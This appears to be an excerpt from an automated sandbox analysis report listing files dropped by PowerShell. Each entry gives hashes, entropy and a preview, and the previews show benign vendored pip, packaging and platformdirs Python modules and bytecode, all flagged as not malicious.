                                                                                                                                                                                                                              Preview:........|.VfI9..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.e.e.e.f.....Z.e.e.e.e.e.f.....f.....Z.e.e.e.e.f.....Z.e.e.e.e.e.e.e.e.f.....e.e.e.f.....f.....d.f.....f.....Z.e.e.e.e.d.f.....e.e.e.e.f.....Z.e.e.e.e.d.f.....f.....Z.e.e.e.e.f.....e.e.e.f.....g.e.f.....Z...e.j8..................d.g.d...........Z.d.e.d.e.d.....f.d...Z...G.d...d.e.........Z ..G.d...d.........Z!..G.d...d.e!........Z"..e.jF..................d.e.jH..........................Z%d.d.d.d.d.d...Z&d.e.d.e.e.....f.d...Z'd.e.d.e.f.d...Z(d.Z)..G.d...d.e!........Z*d.e.d.e.e.e+e.f.....d.e.e.e.e.f.........f.d ..Z,..e.jF..................d!........Z-d"e.d.e.e.....f.d#..Z.d$e.d%e.e.d.f.....d&e.e.e.e.f.........d'e.e.e.e.f.........d(e.e.e.e.f.........d"e.e.e.........d.e.f.d)..Z/y.)*.....N)...Callable..Iterator..List..Optional..SupportsInt..Tuple..Union.....)...Infinity..InfinityType..NegativeInfinity..NegativeInfinityType)...parse..Version..LegacyVe
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11488
                                                                                                                                                                                                                              Entropy (8bit):4.925834660007107
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:lc/LH1a9flJKXeK6nOTp3K26nOTkJLeNNh/FUBCLlw61QQdEQjvBxRRmVpzWAa3/:lyLHYB9vOSOOL+XtUBaQIEUnOpnmR2C5
                                                                                                                                                                                                                              MD5:80DF840E0AC823FA34BCFA543296BA35
                                                                                                                                                                                                                              SHA1:0FF6C9CEB0819AEF9D68CEE59D7942FA0544661F
                                                                                                                                                                                                                              SHA-256:5DC6E25C1FAA723BF76DCA21A7A37DF1332938FE3F8F79BE88E03CA6D2B61966
                                                                                                                                                                                                                              SHA-512:CD5BF95D0A51B0F6DAC148F0706DC18298A4F3E5B8ED0271AF0F54CDA46078AFE22831D29AA5AB65AFA837C0E9F7DC26AAF655AF9C2683714EEEF0232A4A9848
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import collections.import functools.import os.import re.import struct.import sys.import warnings.from typing import IO, Dict, Iterator, NamedTuple, Optional, Tuple...# Python does not provide platform information at sufficient granularity to.# identify the architecture of the running executable in some cases, so we.# determine it dynamically by reading the information from the running.# process. This only applies on Linux, which uses the ELF format..class _ELFFileHeader:. # https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header. class _InvalidELFFileHeader(ValueError):. """. An invalid ELF file header was found.. """.. ELF_MAGIC_NUMBER = 0x7F454C46. ELFCLASS32 = 1. ELFCLASS64 = 2. ELFDATA2LSB = 1. ELFDATA2MSB = 2. EM_386 = 3. EM_S390 = 22. EM_ARM = 40. EM_X86_64 = 62. EF_ARM_ABIMASK = 0xFF000000. EF_ARM_ABI_VER5 = 0x05000000. EF_ARM_ABI_FLOAT_HARD = 0x00000400.. def __init__(self, file: IO[bytes]) -> No
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4378
                                                                                                                                                                                                                              Entropy (8bit):4.78766764346037
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:syyas9WG17I6e+2YvMFtiboTCRhsMMkRZjgPk81iz5Sg:sA0zrlC2oTCRhjRZGksiz5Sg
                                                                                                                                                                                                                              MD5:0210636EA49CABB88154105B88045E64
                                                                                                                                                                                                                              SHA1:D446D94E2B0FE0EC6286292877C3926268ECAB4A
                                                                                                                                                                                                                              SHA-256:FCA1A063FA9CEEF84C1A9A2AB2CDB99F68622C234A46DBF3F660AB4BB824AB27
                                                                                                                                                                                                                              SHA-512:2FFC53A4C2B3600B20C8EFE9C92D77DDAC659C42C74DBC7ABB2478017AC4050D7DEBC190B134369F4AD8E3D6C53ECF4E06C683938C5BDE99DD7675739D6A1C73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""PEP 656 support...This module implements logic to detect if the currently running Python is.linked against musl, and what musl version is used.."""..import contextlib.import functools.import operator.import os.import re.import struct.import subprocess.import sys.from typing import IO, Iterator, NamedTuple, Optional, Tuple...def _read_unpacked(f: IO[bytes], fmt: str) -> Tuple[int, ...]:. return struct.unpack(fmt, f.read(struct.calcsize(fmt)))...def _parse_ld_musl_from_elf(f: IO[bytes]) -> Optional[str]:. """Detect musl libc location by parsing the Python executable... Based on: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca. ELF header: https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html. """. f.seek(0). try:. ident = _read_unpacked(f, "16B"). except struct.error:. return None. if ident[:4] != tuple(b"\x7fELF"): # Invalid magic, not ELF.. return None. f.seek(struct.calcsize("HHI"), 1) # Skip file type
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1431
                                                                                                                                                                                                                              Entropy (8bit):4.46577747812095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:q9O0opV38RGdZdljm6xXryJVVwY/8sWjm6xXryJV+dGdHU0T7:IDo0MdZdljm6xXrEVCljm6xXrEV+dGd/
                                                                                                                                                                                                                              MD5:DE664FEDC083927D3D084F416190D876
                                                                                                                                                                                                                              SHA1:FE0C3747CF14E696276CB6806C6775503DE002B8
                                                                                                                                                                                                                              SHA-256:AB77953666D62461BF4B40E2B7F4B7028F2A42ACFFE4F6135C500A0597B9CABE
                                                                                                                                                                                                                              SHA-512:CFF19A724FAC387599D98C0A365849078DBCBEA65EFCA1EE445F158268B9241E552212A99E7E0B34394D246E3A06C999A7F1A967F64B2724CA9B623D62996C6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details....class InfinityType:. def __repr__(self) -> str:. return "Infinity".. def __hash__(self) -> int:. return hash(repr(self)).. def __lt__(self, other: object) -> bool:. return False.. def __le__(self, other: object) -> bool:. return False.. def __eq__(self, other: object) -> bool:. return isinstance(other, self.__class__).. def __gt__(self, other: object) -> bool:. return True.. def __ge__(self, other: object) -> bool:. return True.. def __neg__(self: object) -> "NegativeInfinityType":. return NegativeInfinity...Infinity = InfinityType()...class NegativeInfinityType:. def __repr__(self) -> str:. return "-Infinity".. def __hash__(self) -> int:. return hash(repr(self)).. def __lt__(self, other: object) -> bool:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8487
                                                                                                                                                                                                                              Entropy (8bit):4.821794705939232
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:FxPaUwnyxKz3Qg94YnHlwlsWGjgJUR4ko739C:FxPaUayxKz3QwHlFW9Az+39C
                                                                                                                                                                                                                              MD5:54536DFF99AD209486558F4D75F5572E
                                                                                                                                                                                                                              SHA1:996AA3D6EDAF2166B1D48525CB6BB39CC4D2996B
                                                                                                                                                                                                                              SHA-256:00904E718F0EAB4918739EF42AEB8F4E4BEEAA302586E7DA13673DB0251B9BAE
                                                                                                                                                                                                                              SHA-512:A28378E1ED0BC4BCD8E9B7F9F9DCF9BE59A9B37424D54883325E311342E1FB53155DBD7341D33A842674BF85CEF8A8FAD4567F638A7B4735179B1C048404626D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import operator.import os.import platform.import sys.from typing import Any, Callable, Dict, List, Optional, Tuple, Union..from pip._vendor.pyparsing import ( # noqa: N817. Forward,. Group,. Literal as L,. ParseException,. ParseResults,. QuotedString,. ZeroOrMore,. stringEnd,. stringStart,.)..from .specifiers import InvalidSpecifier, Specifier..__all__ = [. "InvalidMarker",. "UndefinedComparison",. "UndefinedEnvironmentName",. "Marker",. "default_environment",.]..Operator = Callable[[str, str], bool]...class InvalidMarker(ValueError):. """. An invalid marker was found, users should refer to PEP 508.. """...class UndefinedComparison(ValueError):. """. An invalid operation was attempted on a value that doesn't support it.. """...class UndefinedEnviro
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4676
                                                                                                                                                                                                                              Entropy (8bit):5.0843400479498
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:F8tf9oNRFpYRDjkIyzxNxP9TGYHX/U3dNLGNdfPe8zOUyIgru0Bh:FoMRjacavLCmIEuKh
                                                                                                                                                                                                                              MD5:04B21F77EFDFE2FD090405BA65E94C55
                                                                                                                                                                                                                              SHA1:76AF8951571138A6DFCDD80C7944836795727A52
                                                                                                                                                                                                                              SHA-256:36D0E53C1B688E99F52140BCE623233CDB149AE7E3A529709CD03E5DBE26E4D0
                                                                                                                                                                                                                              SHA-512:94BF50592BC6822E4DDF8015DB795C45E870C50299F2C293C5044018D75B6724574D85ED01E71626796D0353D6A4635B40DBB49FCFD8AFB23A87ED97A6DBF63A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import re.import string.import urllib.parse.from typing import List, Optional as TOptional, Set..from pip._vendor.pyparsing import ( # noqa. Combine,. Literal as L,. Optional,. ParseException,. Regex,. Word,. ZeroOrMore,. originalTextFor,. stringEnd,. stringStart,.)..from .markers import MARKER_EXPR, Marker.from .specifiers import LegacySpecifier, Specifier, SpecifierSet...class InvalidRequirement(ValueError):. """. An invalid requirement was found, users should refer to PEP 508.. """...ALPHANUM = Word(string.ascii_letters + string.digits)..LBRACKET = L("[").suppress().RBRACKET = L("]").suppress().LPAREN = L("(").suppress().RPAREN = L(")").suppress().COMMA = L(",").suppress().SEMICOLON = L(";").suppress().AT = L("@").suppress()..PUNCTUATION = Word("-_.").IDENTIFIER_END
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30110
                                                                                                                                                                                                                              Entropy (8bit):4.322002453359518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ZKP01L5VlEpRuhdwhOuh0Iul8vwcKwbmVX:Z0qLT9Iul87KwC1
                                                                                                                                                                                                                              MD5:7ACAFE408D6D5DD64238FD689638B177
                                                                                                                                                                                                                              SHA1:04FFE4F1C2E6D8796AE64B8D3CCD1B9791F31445
                                                                                                                                                                                                                              SHA-256:2D1434905B07AE5E6A7DC14D10426B20562C9C81D05095D8F5F22C6A44EBAEA1
                                                                                                                                                                                                                              SHA-512:B3CBE5FD1627F46F3BED6B5D12341D45F42070B5ACB37266A6884D2D32E422672F656C00E99AA56894DDC12398E9F76D46C4089095DF6C225E5A37F2E5D30F2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import abc.import functools.import itertools.import re.import warnings.from typing import (. Callable,. Dict,. Iterable,. Iterator,. List,. Optional,. Pattern,. Set,. Tuple,. TypeVar,. Union,.)..from .utils import canonicalize_version.from .version import LegacyVersion, Version, parse..ParsedVersion = Union[Version, LegacyVersion].UnparsedVersion = Union[Version, LegacyVersion, str].VersionTypeVar = TypeVar("VersionTypeVar", bound=UnparsedVersion).CallableOperator = Callable[[ParsedVersion, str], bool]...class InvalidSpecifier(ValueError):. """. An invalid specifier was found, users should refer to PEP 440.. """...class BaseSpecifier(metaclass=abc.ABCMeta):. @abc.abstractmethod. def __str__(self) -> str:. """. Returns the str representation of thi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15699
                                                                                                                                                                                                                              Entropy (8bit):4.672788770491736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:F1dQiA/tDvve/XYdoSwddAhy85lV37oQYKMKEpXlp1tzeVze2XzuWCUDxfvc33:Hd6dvYYdDwddAhy85lV37oQ3D6Xlpnz/
                                                                                                                                                                                                                              MD5:E38B04681F4E31B77B316C978F6749BD
                                                                                                                                                                                                                              SHA1:1A2CECEDF2686B5DE23BEB435957D92894BC990E
                                                                                                                                                                                                                              SHA-256:966B2718D889F02E03FCF7FD3DB334AA06D9BC3F64981F65A590505196B747F6
                                                                                                                                                                                                                              SHA-512:6EEE7A6B90D1676B18EAA84FA010B348207BC88B7DC206696EBA87F85B33CFCED6E297E757A95891B609D7E9647B377001507853C8121D93739D20ADAEEF26A2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import logging.import platform.import sys.import sysconfig.from importlib.machinery import EXTENSION_SUFFIXES.from typing import (. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. cast,.)..from . import _manylinux, _musllinux..logger = logging.getLogger(__name__)..PythonVersion = Sequence[int].MacVersion = Tuple[int, int]..INTERPRETER_SHORT_NAMES: Dict[str, str] = {. "python": "py", # Generic.. "cpython": "cp",. "pypy": "pp",. "ironpython": "ip",. "jython": "jy",.}..._32_BIT_INTERPRETER = sys.maxsize <= 2 ** 32...class Tag:. """. A representation of the tag triple for a wheel... Instances are considered immutable and thus are hashable. Equality checking. is also supported.. """.. __slots__ = ["_interpreter",
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4200
                                                                                                                                                                                                                              Entropy (8bit):4.722653608189815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:FxdJdP1B7ynoaWBo3EQrdip7ARAfb90Cni6excWscJY:Fbb6aTBNAPC/2r3JY
                                                                                                                                                                                                                              MD5:359296260A63D16F5149CCDD7AE70762
                                                                                                                                                                                                                              SHA1:5979C6B8353210E327B4689A66207C56A7C8E3D1
                                                                                                                                                                                                                              SHA-256:7498DE6ADDC14BE4D89F546B505570B9F50C6AC6EDCCB7D8468CBF1D710D7854
                                                                                                                                                                                                                              SHA-512:F91A368431FCF74F3214DAC61427A3A81188EED8ECD2DD8F3036EC32BF149B0C34837EC965C4A4102B64E37F649DF4E90FE4B4104CB46E68B17079B52C5C9401
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import re.from typing import FrozenSet, NewType, Tuple, Union, cast..from .tags import Tag, parse_tag.from .version import InvalidVersion, Version..BuildTag = Union[Tuple[()], Tuple[int, str]].NormalizedName = NewType("NormalizedName", str)...class InvalidWheelFilename(ValueError):. """. An invalid wheel filename was found, users should refer to PEP 427.. """...class InvalidSdistFilename(ValueError):. """. An invalid sdist filename was found, users should refer to the packaging user guide.. """..._canonicalize_regex = re.compile(r"[-_.]+").# PEP 427: The build number must start with a digit.._build_tag_regex = re.compile(r"(\d+)(.*)")...def canonicalize_name(name: str) -> NormalizedName:. # This is taken from PEP 503.. value = _canonicalize_regex.sub("-", name).lower(). return cast
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14665
                                                                                                                                                                                                                              Entropy (8bit):4.534429034326713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FpB0O1ceOvOvEYj7XYzStXzEjlrr6UcMn:10reOvOvEYj7ozStXzQlrr6Ub
                                                                                                                                                                                                                              MD5:8FB00E724A7AF8D0B43FA3365FD3EFF0
                                                                                                                                                                                                                              SHA1:161EDB467745642554AFF7EE33A3EB69FF9E7287
                                                                                                                                                                                                                              SHA-256:FDF2D136B16BC5870755FCA8F2F93D8FCB3A24CF0DFF1B12C5516BE91272728F
                                                                                                                                                                                                                              SHA-512:CC785380E70F1F716079D789DE11E4C6B1A5E20003BEB9871EFECB12C490D4EA64BA0F33D795C07D5DE94C2AC66B5802474158BF71358A258B82837BBC1855D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import collections.import itertools.import re.import warnings.from typing import Callable, Iterator, List, Optional, SupportsInt, Tuple, Union..from ._structures import Infinity, InfinityType, NegativeInfinity, NegativeInfinityType..__all__ = ["parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"]..InfiniteTypes = Union[InfinityType, NegativeInfinityType].PrePostDevType = Union[InfiniteTypes, Tuple[str, int]].SubLocalType = Union[InfiniteTypes, int, str].LocalType = Union[. NegativeInfinityType,. Tuple[. Union[. SubLocalType,. Tuple[SubLocalType, str],. Tuple[NegativeInfinityType, SubLocalType],. ],. ...,. ],.].CmpKey = Tuple[. int, Tuple[int, ...], PrePostDevType, PrePostDevType, PrePostDevType, LocalType.].LegacyCmpKey = T
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):109364
                                                                                                                                                                                                                              Entropy (8bit):4.51837671683019
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:B7CnR4awuxw8KGoDZdjpUHJWqjYeJcE19P+Wzum/V/EQA:B7s/KGofj0LPZBRA
                                                                                                                                                                                                                              MD5:AFE85CE9802C5FCBE3C4B34DD5CC4736
                                                                                                                                                                                                                              SHA1:1626018903F5A6DFD41FB8D60891A84AA3351ADA
                                                                                                                                                                                                                              SHA-256:85301E2423586FB749B1E20356C60ADE63D07A9FE0A618F8B5087E6ECA57F1B8
                                                                                                                                                                                                                              SHA-512:FC7DB98286977CC8F68B8141F9E8A8ED87EAE8D3A956D4C4A1E4F9B6A06CE23DB7A219DB1FBA4E8C5E40ED4E0C4A776E0A28B76B7E076F015D81080C21C715D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Package resource API.--------------------..A resource is a logical file contained within a package, or a logical.subdirectory thereof. The package resource API expects resource names.to have their path parts separated with ``/``, *not* whatever the local.path separator is. Do not use os.path operations to manipulate resource.names being passed into the API...The package resource API is designed to work with normal filesystem packages,..egg files, and unpacked .egg files. It can also work in a limited way with..zip files and with custom PEP 302 loaders that support the ``get_data()``.method...This module is deprecated. Users are directed to :mod:`importlib.resources`,.:mod:`importlib.metadata` and :pypi:`packaging` instead.."""..import sys.import os.import io.import time.import re.import types.import zipfile.import zipimport.import warnings.import stat.import functools.import pkgutil.import operator.import platform.import collections.import plistlib.import email.parser.import err
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):146457
                                                                                                                                                                                                                              Entropy (8bit):5.255982405358272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:AM9onYMjUciID6g5uLAnc/gKPMyhxlumT3EklRq9OVr9cXpOPZg5K:Z9beUcXOVEnWgKEyhxh3TlhgOe5K
                                                                                                                                                                                                                              MD5:BFCC781E03F59A3B1D309AF41B4700F9
                                                                                                                                                                                                                              SHA1:BC69ED5B9EEEA9E4A6ADCD424D4CBEA6BBC33F98
                                                                                                                                                                                                                              SHA-256:0EFAA640D0499D6232E3C0D89638618812520BAAB9EC21421D9B600101E7A0AE
                                                                                                                                                                                                                              SHA-512:BE62482018FA24616C4864BF49C2280DF07705BE9F662BC37E6D467EFD4E803CFA99637C12F81D466CD58CC011233195C38266281A310C9535ED2E6569BBC705
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf4.........................`.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.Z...e...d.d.l.m!Z!....d.d.l.m"Z"m#Z#m$Z$..d.Z%d.d.l.m&Z'..d.d.l(m)Z)m*Z*....d.d.l+m,Z-..e-j\....................d.d.l/m0Z0m1Z1m2Z2..d.d.l3m4Z4..d.d.l3m5Z5....e6d.............e6d.............e6d.............e6d.............e6d...........e.jn..................d.k...r...e8d...........d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd.ZHd.ZI..e.j...................d.eKd...............e.j...................d.e.j...........................ZN..G.d...d.eO........ZPe5j...................j...................ZSi.ZTd...ZUd...ZVd...ZWd...ZXd...ZYd...ZZd ..Z[d!..x.Z\Z]d"..Z^g.d#..Z_..G.d$..d%e`........Za..G.d&..d'ea........Zb..G.d(..d)eb........Zc..G.d*..d+ea........Zd..G.d,..d-ea........Zei.Zf..d.j...................e.jn............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20155
                                                                                                                                                                                                                              Entropy (8bit):4.749223981187306
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:+PZO9oOLdVfVbOcVnDZV2OTF2AOjHiu5BW5fspOhZS5waF5hb6705EmTFs:+PgDqFT5s
                                                                                                                                                                                                                              MD5:2549E67EDC5D9515995B0579E16E00CF
                                                                                                                                                                                                                              SHA1:A608AFE522FC4FEFB694A31E2AB121526E2F864A
                                                                                                                                                                                                                              SHA-256:4A4844615C82FC75070BA297EE7E0CFFA728C9132D101DFC40CC8E608017E989
                                                                                                                                                                                                                              SHA-512:EB2A405AF6E9FC31537D4EF8927ACFF6745F517A95BA3E2C8DE3F5AE58EF8FBFF880A3B28ED51F4A0E2F4D85E6F030982CF91C8808F700CF75AC2D320AE87F04
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Utilities for determining application-specific dirs. See <https://github.com/platformdirs/platformdirs> for details and.usage..""".from __future__ import annotations..import os.import sys.from typing import TYPE_CHECKING..from .api import PlatformDirsABC.from .version import __version__.from .version import __version_tuple__ as __version_info__..if TYPE_CHECKING:. from pathlib import Path.. if sys.version_info >= (3, 8): # pragma: no cover (py38+). from typing import Literal. else: # pragma: no cover (py38+). from pip._vendor.typing_extensions import Literal...def _set_platform_dir_class() -> type[PlatformDirsABC]:. if sys.platform == "win32":. from pip._vendor.platformdirs.windows import Windows as Result. elif sys.platform == "darwin":. from pip._vendor.platformdirs.macos import MacOS as Result. else:. from pip._vendor.platformdirs.unix import Unix as Result.. if os.getenv("ANDROID_DATA") == "/data" and os.getenv("ANDROID_
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1476
                                                                                                                                                                                                                              Entropy (8bit):4.724060252133051
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:mFd8dDXoPPzFm2Hpm4fX5syOrheytw/1uZMeheyo/1uZMeQyKS/1uZMJY4yb/1u+:mgdDXoPPzE2Hpm4fX5qhY/wiehS/wieW
                                                                                                                                                                                                                              MD5:845D1D5F5662F331494544E6C660FCCC
                                                                                                                                                                                                                              SHA1:94FF1A360C3481CDACD76582FC7BD9AA36C4A4C5
                                                                                                                                                                                                                              SHA-256:7D5BD2893CEBDBE44CE88B235A38F87E468EB433A00E1516BFAB00F7D768E024
                                                                                                                                                                                                                              SHA-512:B2C6E49B0DCCF1BFA8BD938D9737FE92D5E67A7F3C3556E17B4B0500EB787E8F47021F2777E5EE6430B7E0B8A0B7D1B695C9E29987E3BB657DF2FD3BA1C9E456
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Main entry point.""".from __future__ import annotations..from pip._vendor.platformdirs import PlatformDirs, __version__..PROPS = (. "user_data_dir",. "user_config_dir",. "user_cache_dir",. "user_state_dir",. "user_log_dir",. "user_documents_dir",. "user_downloads_dir",. "user_pictures_dir",. "user_videos_dir",. "user_music_dir",. "user_runtime_dir",. "site_data_dir",. "site_config_dir",. "site_cache_dir",.)...def main() -> None:. """Run main entry point.""". app_name = "MyApp". app_author = "MyCompany".. print(f"-- platformdirs {__version__} --") # noqa: T201.. print("-- app dirs (with optional 'version')") # noqa: T201. dirs = PlatformDirs(app_name, app_author, version="1.0"). for prop in PROPS:. print(f"{prop}: {getattr(dirs, prop)}") # noqa: T201.. print("\n-- app dirs (without optional 'version')") # noqa: T201. dirs = PlatformDirs(app_name, app_author). for prop in PROPS:. print(f"{prop}:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18012
                                                                                                                                                                                                                              Entropy (8bit):5.340053437637962
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Tc6OCDJOOXiDOTbRdzOyLOjjdfPrOho32EqP3lRs4so4gFQed43C:TcUR6eDYY9d43C
                                                                                                                                                                                                                              MD5:8989AFBBD995F6355421709D99C528F4
                                                                                                                                                                                                                              SHA1:A4ABF08E9FA044AF0192719719C307E9E02ED026
                                                                                                                                                                                                                              SHA-256:27151ECCD5C9AC2A681BCB13C43111DC30B0B572BE42085D3E6A3DCCFA85A949
                                                                                                                                                                                                                              SHA-512:D35E8F26B8CB303565F82BA511C845A03314C61B01FF3ADA2508A1798BF21DFCFF625E7790109FD270E2D0893D405C7E8900DC271B56644F92EDE6A88DB89030
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.N..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r"d.d.l.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z...d*d...Z...e.........Z.e.Z...........d+......................d,d...Z...........d+......................d-d...Z...........d+......................d,d...Z...........d+......................d-d...Z...........d.......................d/d...Z...........d.......................d/d...Z...........d+......................d,d...Z...........d.......................d/d...Z.d0d...Z.d0d...Z.d0d...Z.d0d...Z d0d...Z!..........d.......................d/d...Z"..........d+......................d1d...Z#..........d+......................d2d...Z$..........d+......................d1d...Z%..........d+......................d2d...Z&..........d.......................d3d...Z'..........d.......................d3d ..Z(..........d+......................d1d!..Z)..........d.......................d3d"..Z*d4d#..Z+d4d$..Z,d4d%..Z-
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1929
                                                                                                                                                                                                                              Entropy (8bit):5.491224208227472
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:WpulvnGZVPugbKpLygm3YmAZWml8mBzb8KY+GKNncjWYBYavXmsrrNlPq:WpuRGZVPugbKLzb8KY+DcjWYBDvX5X7q
                                                                                                                                                                                                                              MD5:74BAB0E5AA143E958357776CE84C9E34
                                                                                                                                                                                                                              SHA1:6BFF19A89A9C55F4DD18E48F909176D0E698DA1D
                                                                                                                                                                                                                              SHA-256:67C3507FA7252FDCE624D8F842CD052563F4F660792CD986703DAF8C80C11C82
